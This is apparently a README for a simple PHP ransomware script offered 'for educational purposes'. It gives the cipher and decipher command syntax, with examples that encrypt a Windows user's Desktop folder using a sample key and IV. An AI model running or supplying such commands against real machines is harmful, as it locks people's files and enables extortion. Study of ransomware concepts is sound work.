Simple Ransomware coded in PHP for educational purposes only.
This ransomware was coded to demonstrate the concept of a ransomware through PHP.
The code is just ciphering & deciphering a directory with a key and an IV.
php ransomware.php cipher [repertory] KEY.IV
ex :
php ransomware.php cipher C:\Users\XXX\Desktop\ Fuck1ngH4rdc0reK3y!*.V3ry_D1ff1culT_1n1t1al1s4t10n_v3ct0r
php ransomware.php decipher [repertory] KEY.IV
ex :
php ransomware.php decipher C:\Users\XXX\Desktop\ Fuck1ngH4rdc0reK3y!*.V3ry_D1ff1culT_1n1t1al1s4t10n_v3ct0r

